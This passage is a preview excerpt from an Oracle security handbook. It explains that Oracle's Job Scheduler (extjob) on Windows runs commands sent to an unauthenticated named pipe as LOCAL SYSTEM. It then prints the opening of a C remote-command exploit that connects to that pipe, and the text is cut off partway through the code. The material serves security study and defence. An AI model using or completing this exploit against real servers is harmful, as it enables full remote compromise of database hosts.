10.4. Running OS Commands Directly with the Job Scheduler
The Job Scheduler is implemented as an external process — extjob. On Windows this runs with the privileges of the LOCAL SYSTEM operating system account. It listens on a named pipe called "orcljsex<SID>" where SID is the database system identifier. When the Job Scheduler receives a command down this named pipe, it simply attempts to execute it. As such, anyone that can connect to the named pipe, whether locally or across the network using SMB, can run commands as LOCAL SYSTEM and fully compromise the server:
/* Oracle External Job Remote Command Exploit Oracle's extjob.exe listens on a named pipe "orcljsex<SID> and executes commands sent through it. */ #include <stdio.h>
#include <windows.h> int main(int argc, char *argv[]) { char buffer[540]=""; char NamedPipe[260]="\\\\"; HANDLE rcmd=NULL; char *ptr = NULL; int len =0; DWORD Bytes = 0; if(argc !=4) { printf("\n\tOracle External Job Remote Command Exploit.\n\n"); printf("\tUsage: oraextjob target SID \"command\"\n"); printf("\n\tDavid Litchfield\n\t(david@ngssoftware.com)\n\t1st October 2006\n"); return 0; } strncat(NamedPipe,argv[1],100); strcat(NamedPipe,"\\pipe\\orcljsex"); len = strlen(NamedPipe); if(len>256) return printf("Too long...\n"); len = 256 - len; // tack on the SID strncat(NamedPipe,argv[2],len); // Open the named pipe rcmd = CreateFile(NamedPipe,GENERIC_WRITE|GENERIC_READ,0,NULL,OPEN_EXISTING,0,N ULL); if(rcmd == INVALID_HANDLE_VALUE) return printf("Failed ...Get The Oracle® Hacker's Handbook: Hacking and Defending Oracle now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.
